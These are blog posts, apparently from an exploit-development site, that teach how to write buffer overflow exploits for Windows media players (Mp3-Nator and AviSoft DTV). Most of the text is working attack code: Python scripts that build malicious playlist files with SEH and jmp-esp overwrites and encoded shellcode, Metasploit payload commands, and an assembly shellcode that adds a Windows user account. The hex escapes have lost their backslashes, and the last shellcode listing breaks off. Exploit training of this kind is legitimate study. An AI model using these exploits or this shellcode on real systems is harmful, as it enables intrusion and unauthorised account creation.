Exploit writing>>> SEH based!

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Today i have re-exploited a software called mp3-nator. SEH based is bit challenging. I am going to show you quickly that how i exploited this SEH based vulnerable using only following tools:

1. Immunity Debugger.
2. mona.py (Corelan).
3. Metasploit(For  shellcode).
4. Vulnerable Application

Access Violation!
First going to make the application crashed(The classic way!). Before that attach the application to immunity debugger. Hope you already know how to attach an application on Immunity Debugger(File>>Attach>> Find Mp3-Nator>>Click on Attach):

The simple python script:

print "Creating expoit."
f=open("nator.plf","w") #Create the file

push="A"*6000

try:
f.write(push)
f.close()
print "File created"
except:
print "File cannot be created"

After generating the “nator.plf” we need to open the file:

1. Click on PlayList menu
2. Load PlayList.
3. Open the nator.plf.

But unfortunately it is not going to overwrite the EIP at all because of SEH.

EDX,EBP,ESI and EDI holding our own buffer(We can replace with shellcode!). But SEH also got overwritten by our buffer:

Overwriting SEH mean we can control SEH and Next SEH, Which mean we can make the SEH to divert the call to your shellcode!

What ? What is SEH? The SEH
Buffer space
I used mona.py to create the pattern(metasploit can do this too). If you don’t know to install mona or how to use it then go to  redmine.corelan.be/projects/monaβ€Ž And read the manual.

The simple mona command is : pattern_create 6000 and replace “A” with the pattern saved in indicated location(For me it is on: C:monaMP3N) . Re-generate the nator.plf and open with Mp3-nator on Immunity and we see:

We see SEH and Next SEH got overwritten with mona’s pattern. Actually this time we need to find out how much junk buffer we need to reach the SEH(Same as EIP). Let’s find:

Now we are sure that we need 4112 bytes to overwrite SEH. To be 100% sure we are going to test it again:

print "Creating expoit."
f=open("nator.plf","w") #Create the file

push="A"*4108 #4112-4
push+="B"*4 #Next SEH
push+="C"*4 #SEH
push+="D"*2000 #Shellcode
try:
f.write(push)
f.close()
print "File created"
except:
print "File cannot be created"

If next SEH is “BBBB” and SEH is “CCCC” then we are ready to go πŸ™‚ .

DO SOMETHING WITH SEH and NSEH

 

This time we want to overwrite SEH and Next SEH with an valid address so that it goes to our shellcode. The common address to find “pop pop ret” for SEH and few bytes jump address in Next SEH.

Run mona command !mona seh at crash time ,open the file and find the null-free  address. But unfortunately our life is not that easy so there is no no null-free address. The Exploit is going to be bit challenging.

Anyway, I have choose the address 0x00448f7a of MP3N.exe.  Since we have Null byte at our return address so we simply can’t put our shellcode normally as we did before.

Do the Calculation

 Calculation for storing shellcode 

LONG JUMP
                        
NSEH
Our calculation is done!!!
BUILDING THE EXPLOIT

Now our exploit:

junk+shellcode+nops+jump+nseh+seh+more

in normal SEH based overflow we first find an address for “pop pop ret” and a short jump in NSEH , Such as “xebx08x90x90” but this is forward jump whereas we need backward jump as we already calculated using metasm(jmp $-20) . Anyway, Since we have only null-bytes SEH(0x00448f7a) address so we can’t simply short jump to our nops or shellcode.  For this reason we will need a long jump to land in where our nops starts.

The simple way to explain this,

Junk 2608. Put nops instead “A” to be safe. Then put the 343 bytes shellcode. So stack holding 2608+343 , Then more 1152 nops(x90) and the long jump “xe9x2bxf8xffxff”   . The long jump is some kind of instruction and it is 5 bytes. We now have exact bytes to overwrite the SEH and NSEH with our address:

2608+343+1152+5=4108 .

After the 4108 junk we need NSEH to make a short jump to our long jump. If we make 20 bytes backward jump then we land in our nops within 1152. Remember, Nops does nothing but goes over. So stack simply again executing the long jump  “xe9x2bxf8xffxff”. After executing the long jump it will again go back to our nops within 2608. After the the nops we have shellcode to execute. Since we made 2000 backward jump so it needs 1113 nops to pass to reach our shellcode.

Anyway, Let’s get back to debugger and do some test:

print "Creating expoit."
f=open("nator.plf","w") #Create the file

#343 bytes shellcode
shellcode ="D"*343
nops ="x90"*1152
jump ="xe9x2bxf8xffxff" #Jump back -2000 bytes
nseh ="xebxeax90x90" #short jump
seh ="x7ax8fx44x00" #0x00448f7a
more="x90"*1000

try:
f.write(junk+shellcode+nops+jump+nseh+seh+more)
f.close()
print "File created"
except:
print "File cannot be created"

Open the application on debugger,run and search the SEH address 0x00448f7a . Set a breakpoint by pressing F2.

Now open the nator.plf on the application. Just press SHIFT+F9 at first crash. We hit our breakpoint. If we scroll down a bit lower then we see that we have a bunch of “D” within our 4108bytes

 After pressing SHIFT+F9 we hit the breakpoint. Now press F8 until we reach nop:

We just did a backward jump to 20 bytes nops. Well Let’s keep going with F8. 0012FD53  ^E9 2BF8FFFF      JMP 0012F583 Actually the long jump. And it again goes back to 2000bytes backward where our nops start. So if we keep going by pressing F8 then we will reach the “44” soon which mean “D”, Later we will replace the D with our real shellcode.

 So it is time to put our real shellcode. Here is the final script:

print "Creating expoit."
f=open("nator.plf","w") #Create the file
junk="x90"*2608
#343 bytes shellcode
shellcode =("xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44"
"x42x30x42x50x42x30x4bx48x45x54x4ex43x4bx38x4ex47"
"x45x50x4ax57x41x30x4fx4ex4bx58x4fx54x4ax41x4bx38"
"x4fx45x42x42x41x50x4bx4ex49x44x4bx38x46x33x4bx48"
"x41x50x50x4ex41x53x42x4cx49x59x4ex4ax46x58x42x4c"
"x46x57x47x30x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e"
"x46x4fx4bx53x46x55x46x32x46x50x45x47x45x4ex4bx58"
"x4fx45x46x52x41x50x4bx4ex48x56x4bx58x4ex50x4bx44"
"x4bx48x4fx55x4ex41x41x30x4bx4ex4bx58x4ex41x4bx38"
"x41x50x4bx4ex49x48x4ex45x46x32x46x50x43x4cx41x33"
"x42x4cx46x46x4bx38x42x44x42x53x45x38x42x4cx4ax47"
"x4ex30x4bx48x42x44x4ex50x4bx58x42x37x4ex51x4dx4a"
"x4bx48x4ax36x4ax30x4bx4ex49x50x4bx38x42x58x42x4b"
"x42x50x42x50x42x50x4bx38x4ax36x4ex43x4fx45x41x53"
"x48x4fx42x46x48x35x49x38x4ax4fx43x48x42x4cx4bx57"
"x42x45x4ax36x42x4fx4cx38x46x30x4fx35x4ax46x4ax39"
"x50x4fx4cx38x50x50x47x55x4fx4fx47x4ex43x46x41x46"
"x4ex46x43x36x42x50x5a")
nops ="x90"*1152
jump ="xe9x2bxf8xffxff" #Jump back -2000 bytes
nseh ="xebxeax90x90" #short jump
seh ="x7ax8fx44x00" #0x00448f7a
more="x90"*1000

try:
f.write(junk+shellcode+nops+jump+nseh+seh+more)
f.close()
print "File created"
except:
print "File cannot be created"

Note: I have copied the shellcode from an working exploit. But you can always generate shellcode using metasploit. Do so!

And pop up the calc:

BOOM!!!

The most important of this exploit is dealing with NULL-BYTES “pop pop ret”.  I hope you now have clear understanding of how to work with these kind of situation. But still if you have any problem , Contact me or comment here and i will try my best to help you!

I have tried to make it simple. If you want to know more about SEH base Exploits , corelan has very good tutorial about SEH:
https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/  and

https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/

Good luck and happy hunting!!!

My first shellcode was in two registers, The adduser shellcode!

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

I always tried to learn to write simple shellcode in assembly language. But writing the shellcode was not my first interest , my interest was Exploit writing. I had to learn to understand assembly language for various reason such as Understanding how computer works, Effectively use of Debugger, Exploit writing,fun etc. So i searched on Google a lots “Writing shellcode” , Fortunately I found some amazing tutorials(Reference!). I will explain each line of my first shellcode below. Before that i want to tell that what tools i used to write this shellcode:

1. Nasm: www.nasm.us

2. arwin: http://www.vividmachines.com/shellcode/arwin.c

3. xxd-shellcode: http://www.projectshellcode.com/downloads/xxd-shellcode.sh

4. shellcode-test: http://www.vividmachines.com/shellcode/shellcodetest.c

The shellcode:

;add user shellcode. Only will work on windows xp3. Written by pusheax.com 
[BITS 32]

global _start

section .text

_start:
jmp short command


function: ;Label
;WinExec("Command to execute",NULL)
pop ecx
xor eax,eax
push eax
push ecx
mov eax,0x7c8623ad
call eax

xor eax,eax
push eax
mov eax,0x7c81cafa
call eax



command: ;Label
call function
db "cmd.exe /c net user pusheax popebp /ADD"
db 0x00


So let me explain each line

[BITS 32] : Tell the nasm the code is for 32bit.

global _start : Declare main starting label .

section .text : Declare the code section.

jmp short command: jmp instruction used for jumping to another label call “command” . “Call” instruction is not possible because “call” will save then next instruction to stack to get back to next instruction. This is really a common trick when writing shellcode. So it is telling to jump to “command” label and keep no return address in stack.

So now we are in label “command” and it holds following instructions:-

call function : Calling “function” label and saving the next address(whatever) in stack for return purpose . The Next instruction is simple system command:

 db “cmd.exe /c net user pusheax popebp /ADD”

So whatever , we are in label “function” 
There is a simple windows API  we need call is WinExec(), http://msdn.microsoft.com/en-us/library/windows/desktop/ms687393%28v=vs.85%29.aspx  . It only requires two parameter.

pop     ecx : Take the current return address into ecx and remove the address from stack.

xor     eax,eax : cleaning the eax register to 0. We can directly push 0 to stack but clearly it will issue null bytes. So most shellcoder does xor.

push     eax : pushing 0 to stack. Since Stack is LIFO so it will be the last parameters.

push     ecx : Do you remember that we have popped an address into ecx ? ecx actually holding “cmd.exe /c net user pusheax popebp /ADD” . So we need to push this string to stack for WinExec() first parameter. Currently stack holds: WinExec(“cmd.exe /c net user pusheax popebp /ADD”,NULL).

mov     eax,0x7c8623ad :   0x7c8623ad is address of WInExec(). Moving this address into eax . I found this address using arwin.exe ( ./arwin.exe Kernel32.dll WinExec ).

call      eax : eax=WinExec(). So it is executing the API function.

xor    eax,eax: clean eax register. Because we are going to terminate the current process soon. We are going to call ExitProcess() function to exit the current process. otherwise shellcode may get corrupted. You may see it on Debugger. 

 push   eax: Same as above we are pushing the last parameters to stack.

mov     eax,0x7c81cafa : Same as above i used arwin to find the address of ExitProcess() function.

call      eax: eax=ExitProcess’s address. Calling eax will execute the function.

Test

1. nasm -f bin -o shellcode.bin
2. ./xxd-shellcode.sh shellcode.bin
3. paste into the shellcode-test.c:
4. compile with mingw and execute then check the new user name :).

 Reference:

https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/

http://projectshellcode.com/node/20

Exploit writing – Stack based Buffer overflow

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

There are many exploit writing tutorials. But the corelan’s exploit writing tutorials are much much better. If you want to learn exploit development , of course you may get started with corelan too. Anyway,

Today i have tried to exploit an application , found at http://www.exploit-db.com/exploits/22932/ (The exploit script did not work for me). Exploiting the vulnerability was very easy but specifically finding the bad char was bit tricky. At least I was able to find all bad char using Corelan’s mona.py and exploited the application successfully.  The following tools i used to develop the exploit:

1. Vmware workstation .

2. Python.

3. Immunity Debbugger .

4. Mona.py. (Copy mona.py to “C:Program FilesImmunity IncImmunity DebuggerPyCommands”)

5. Windows XP3 and windows 7.

6. Metasploit.

If you are going to try/build this exploit yourself then you also need those above tools, So make sure to download them as your preparation.

i have downloaded the vulnerable application first and installed on windows xp3 vm.

                                      CRASH AND LENGTH OF BUFFER

The simple crash script was:

print "Creating expoit."
f=open("crash-me.PLF","w")
push="A" * 2000

try:
f.write(push)
f.close()
print "File created"
except:
print "File cannot be created"

It will create a file “crash-me.PLF” . If i open the file in AviSoft DTV Player then it just crashes. Well, Let’s Attach with Immunity Debugger to see what is happening.

Click on Debbug>>Run .

Now let’s open the “crash-me.PLF” :

So its finally crashed and i saw esp and eip register contains “AAAAAAAA….” :

It clearly indicating that i control EIP which is mean the crash is really exploitable(Explaining later!).   Now it is time to find how many the stack requiring for getting overwritten EIP. So time to work with a great tool mona.py .  There was old odd way to do that but now we can do it using metasploit or mona.py very easily. We already know the application crashed since we sent 2000Bytes junk. So we will create a Cycling Patter using mona.

First i set default working folder for mona:

mona config -set workingfolder c:mona%p

Then Mona command is : 

!mona pattern_create 2000

 It just created a file in C:monaAviosoftDTV called “pattern.txt” . This time need to edit the script again and put the Cycling patter instead “A”.  the full script will be look like this:

print "Creating expoit."
f=open("crash-me.PLF","w")
push="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co"

try:
f.write(push)
f.close()
print "File created"
except:
print "File cannot be created"

Replacing “A”*2000 with following pattern generated by mona

Now need to regenerate the “crash-me.PLF” file and open with AviSoft DTV(Already attached with debugger) . So the application crashed again but  with mona’s Cycling pattern instead “AAAAAA…” . So i need to take note of EIP value. In my case it is “37694136” :

This time we need to figure out the exact bytes to overwrite EIP . For this mona is enough :

!mona pattern_offset 37694136

 It tells that we need 260 bytes to overwrite stack and more 4 bytes we will need to overwrite EIP. So it is 260+4=264 bytes

Let’s modify the script again:

print "Creating expoit."
f=open("crash-me.PLF","w") #Create the file

push="A"*260 #Found by mona.py
eip ="BBBB" #more 4 bytes to overwrite EIP
junk="C"*1736 #Later will replace this with real shellcode

try:
f.write(push+eip+junk)
f.close()
print "File created"
except:
print "File cannot be created"

In the script i have replaced Cycling patter with 260 bytes “A” and more 4 bytes to overwrite EIP with “BBBB” then 1736 bytes (2000-264). If first junk(260 bytes) length is okay then EIP will be “BBBB”. Let’s try:

See EIP is 42424242=BBBB and ESP(Stack Pointer) is contains CCCC.. But here i see another problem that after EIP  some “CCCC”:

0012EB5C   42424242  BBBB
0012EB60 43434343 CCCC
0012EB64 43434343 CCCC
0012EB68 43434343 CCCC
0012EB6C 43434343 CCCC


We really need to jump over these nasty junk. See later on. Anyway, We see we are controlling EIP. Because there are  “BBBB”.

Our Next goal will be:

1. Replacing “BBBB” with valid pointer(Pointer to esp and esp will hold shellcode)
2. Solving an(CCCC… after EIP) easy problem.
3. Replacing “CCCCCC…” with real shellcode.

                                                                   FIND EIP
Let’s find EIP address. EIP address can be found in application or OS dll. For reliability we should always try to use Application’s dll if possible. So In this application i am going to find the EIP from application’s dll. Again i will use use mona(mona is very powerful and i know what i am doing.) . So the command should be:

!mona jmp -r esp -o


It will create a file called “jmp.txt” in “C:monaAviosoftDTV” and there will be following contents:

0x6034c153 : jmp esp |  {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:Program FilesAviosoftAviosoft DTV Player ProConfiguration.dll)
0x6034c4db : jmp esp | {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:Program FilesAviosoftAviosoft DTV Player ProConfiguration.dll)
0x6034d9cb : jmp esp | {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:Program FilesAviosoftAviosoft DTV Player ProConfiguration.dll)
0x6034dc73 : jmp esp | {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:Program FilesAviosoftAviosoft DTV Player ProConfiguration.dll)
0x640614e3 : jmp esp | {PAGE_EXECUTE_READWRITE} [MediaPlayerCtrl.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.0.2 (C:Program FilesAviosoftAviosoft DTV Player ProMediaPlayerCtrl.dll)
0x640627a3 : jmp esp | {PAGE_EXECUTE_READWRITE} [MediaPlayerCtrl.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.0.2 (C:Program FilesAviosoftAviosoft DTV Player ProMediaPlayerCtrl.dll)
0x64119bc3 : jmp esp | {PAGE_EXECUTE_READWRITE} [NetReg.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.12.11.2006 (C:Program FilesAviosoftAviosoft DTV Player ProNetReg.dll)
0x6411a7ab : jmp esp | {PAGE_EXECUTE_READWRITE} [NetReg.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.12.11.2006 (C:Program FilesAviosoftAviosoft DTV Player ProNetReg.dll)

Here i will use 0x6411a7ab. Before that for learning purpose let’s find this address manually using Immunity Debugger itself(First we need to trigger the crashed otherwise all dll won’t load properly):

1. Immunity Debugger menu : View>> View Executable Modules .
2. Find the “NetReg.dll” and double click on it:

3. Our goal is finding “JMP ESP” . 
4. Right click on the window and Search For>> All Commands>>

5. Now another window will pop up and search for “jmp esp”

I was keeping searching until found the 0x6411a7ab.

                             ATTEMPT TO EXECUTE SHELLCODE
Anyway, let’s get back to real work. We need to modify the script put the address in EIP variable instead “BBBB”. We should remember that windows is little endian , means we need reverse the address so EIP should be “0x6411a7ab=xabxa7x11x64. Here is the modified script:

print "Creating expoit."
f=open("crash-me.PLF","w") #Create the file

push="A"*260 #Found by mona.py
eip ="xabxa7x11x64" #EIP
junk="C"*1500 #Later will replace this with real shellcode

try:
f.write(push+eip+junk)
f.close()
print "File created"
except:
print "File cannot be created"
Let’s run the application through Debugger and it should now have the exact address i have set. Time to make the application execute the shellcode. So i am modifying the script again to make it more safe:

print "Creating expoit."
f=open("crash-me.PLF","w") #Create the file

push="x90"*260 #Found by mona.py, "A" Replaced with nops
eip ="xabxa7x11x64" #EIP
junk="x90"*500 #More nops before reach to shellcode
shellcode="D"*1000 #Will replace with shellcode.
try:
f.write(push+eip+junk+shellcode)
f.close()
print "File created"
except:
print "File cannot be created"
What i did on above script is just replaced all “A” with nops. Nops mean do nothing but pass to next instruction(Not a good idea?). Recently i mentioned that after EIP we see some unnecessary “CCCCCC…”  which will completely break our exploit. Putting enough nops will solve this problem too. Before going to next step let’s test it if it is working as i expected.

1. Setting breakpoint at EIP address 0x6411a7ab to make sure that our exploit is reaching to right address. To do that we need to following :

Right click>>Go to >>Expression

2. When new window will pop up , search the eip address,  You may need to search it twice. If found the address then we will see like this:

3. Now press F2. It may warn you about breakpointing to this address but you can ignore the warning. Well, Now i am going to open it(Attached with debugger). It hits the breakpoint and i can see now i am landing to nops directly:

So it worked!

Let’s put real shellcode instead “D”. It is time to use metasploit to generate windows/exec shellcode to execute calc.exe:

msfpayload windows/exec cmd=calc R |msfencode -b "x00x0a" -t c

I tried to avoid the normal bad char “x00x0a”. And Metasploit  generated following shellcode:

 

[*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)

unsigned char buf[] =
"xbex28xc7x1bx1fxd9xedxd9x74x24xf4x58x31xc9xb1"
"x32x31x70x12x83xe8xfcx03x58xc9xf9xeax64x3dx74"
"x14x94xbexe7x9cx71x8fx35xfaxf2xa2x89x88x56x4f"
"x61xdcx42xc4x07xc9x65x6dxadx2fx48x6ex03xf0x06"
"xacx05x8cx54xe1xe5xadx97xf4xe4xeaxc5xf7xb5xa3"
"x82xaax29xc7xd6x76x4bx07x5dxc6x33x22xa1xb3x89"
"x2dxf1x6cx85x66xe9x07xc1x56x08xcbx11xaax43x60"
"xe1x58x52xa0x3bxa0x65x8cx90x9fx4ax01xe8xd8x6c"
"xfax9fx12x8fx87xa7xe0xf2x53x2dxf5x54x17x95xdd"
"x65xf4x40x95x69xb1x07xf1x6dx44xcbx89x89xcdxea"
"x5dx18x95xc8x79x41x4dx70xdbx2fx20x8dx3bx97x9d"
"x2bx37x35xc9x4ax1ax53x0cxdex20x1ax0exe0x2ax0c"

Anyway, Let’s modify the script again:

print "Creating expoit."
f=open("crash-me.PLF","w") #Create the file

push="x90"*260 #Found by mona.py
eip ="xabxa7x11x64" #EIP
junk="x90"*500 #500 nops before real shellcode
shellcode=("xbex28xc7x1bx1fxd9xedxd9x74x24xf4x58x31xc9xb1"
"x32x31x70x12x83xe8xfcx03x58xc9xf9xeax64x3dx74"
"x14x94xbexe7x9cx71x8fx35xfaxf2xa2x89x88x56x4f"
"x61xdcx42xc4x07xc9x65x6dxadx2fx48x6ex03xf0x06"
"xacx05x8cx54xe1xe5xadx97xf4xe4xeaxc5xf7xb5xa3"
"x82xaax29xc7xd6x76x4bx07x5dxc6x33x22xa1xb3x89"
"x2dxf1x6cx85x66xe9x07xc1x56x08xcbx11xaax43x60"
"xe1x58x52xa0x3bxa0x65x8cx90x9fx4ax01xe8xd8x6c"
"xfax9fx12x8fx87xa7xe0xf2x53x2dxf5x54x17x95xdd"
"x65xf4x40x95x69xb1x07xf1x6dx44xcbx89x89xcdxea"
"x5dx18x95xc8x79x41x4dx70xdbx2fx20x8dx3bx97x9d"
"x2bx37x35xc9x4ax1ax53x0cxdex20x1ax0exe0x2ax0c")
shellcode+="x90"*900 #Okay, Need enough junk , so nops instead "A"

all=push+eip+junk+shellcode

try:
f.write(all)
f.close()
print "File created"
except:
print "File cannot be created"

Well, ReGenerate the “crash-me.PLF” file and opening with the attached avisoft dtv but unfortunately it just crashed….

It does not even land to nops(wtf!). Seems it is happening for bad char, some code has been truncated. But no problem we can find the bad char using mona and this was my new knowledge today learning to use mona to find bad char easily. bad chars can corrupt, truncate our shellcode. If there is any bad chars then our exploits won’t work!

So instead spending much time i am going to use mona to find the bad chars(This will be good idea).I am using the first crash PoC again. Let’s see how i did it.

                                                    

                                                      FINDING BAD CHARS
First command:

!mona bytearray -b "x00"

“x00” is common bad char so i used it to generate all bytecode using mona.

Mona created two file in C:monaAviosoftDTV , 1. bytearray.txt 2. bytearray.bin . bytearray.bin is binary which will need later for comparing.

Well, in bytearray.txt are following contents :

Modify the script and put the generated output to the script right after  variable push=”A”*2000 :

print "Creating expoit."
f=open("badchar.PLF","w") #Create the file

push="A"*2000 #Found by mona.py
push+=("x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20"
"x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40"
"x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60"
"x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80"
"x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0"
"xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0"
"xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0"
"xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff")


try:
f.write(push)
f.close()
print "File created"
except:
print "File cannot be created"

Now generate the file “badchar.PLF”. Attach the application with debugger, run, open “badchar.PLF” and use another mona command is :

!mona compare -f C:monaAviosoftDTVbytearray.bin

It will create another file called “compare.txt” when we will see like this:

open “compare.txt” in notepad and search for “stack”(http://pastebin.com/YLCnyne7) and after scrolling down a little bit i can see :

                | File           | Memory         | Note       
---------------------------------------------------------------
0 0 9 9 | 01 ... 09 | 01 ... 09 | unmodified!
---------------------------------------------------------------
9 9 99 100 | 0a ... 6c | 00 ... 61 | expanded
108 109 1 1 | 6d | 6d | unmodified!
109 110 5 5 | 6e 6f 70 71 72 | 20 46 69 6c 65 | corrupted
114 115 1 1 | 73 | 73 | unmodified!
115 116 2 2 | 74 75 | 5c 41 | corrupted
117 118 1 1 | 76 | 76 | unmodified!
118 119 137 137 | 77 ... ff | 69 ... 00 | corrupted

Possibly bad chars: 0a
Bytes omitted from input: 00

It is comparing data’s file and memory. If there is no bad char then File and Memory data will be same. See above the first line:

9   9   99  100 | 0a ... 6c      | 00 ... 61      | expanded 

Unfortunately it did not match. Mona also suggesting that the bad char may be “0a” because “0a” from file does not match to memory … is it?

So this time again we need to generate bytearray:

!mona bytearray -b "x00x0a"

Now we again need to compare with bytearray(See above, it is same)…. Just keep doing it until i found all bad chars.

                             

                                              EXECUTE SHELLCODE
By mona i found the bad chars are “x00xffx0ax0dx1a” . After found these bad chars i regenerated the shellcode:

root@pusheax.com:/usr/bin# msfpayload windows/exec cmd=calc R |msfencode -b "x00xffx0ax0dx1axff" -t c
[*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)

unsigned char buf[] =
"xdaxdbxd9x74x24xf4x5bx31xc9xb1x32xb8x6exb9xe3"
"x05x31x43x17x83xc3x04x03x2dxaax01xf0x4dx24x4c"
"xfbxadxb5x2fx75x48x84x7dxe1x19xb5xb1x61x4fx36"
"x39x27x7bxcdx4fxe0x8cx66xe5xd6xa3x77xcbxd6x6f"
"xbbx4dxabx6dxe8xadx92xbexfdxacxd3xa2x0exfcx8c"
"xa9xbdx11xb8xefx7dx13x6ex64x3dx6bx0bxbaxcaxc1"
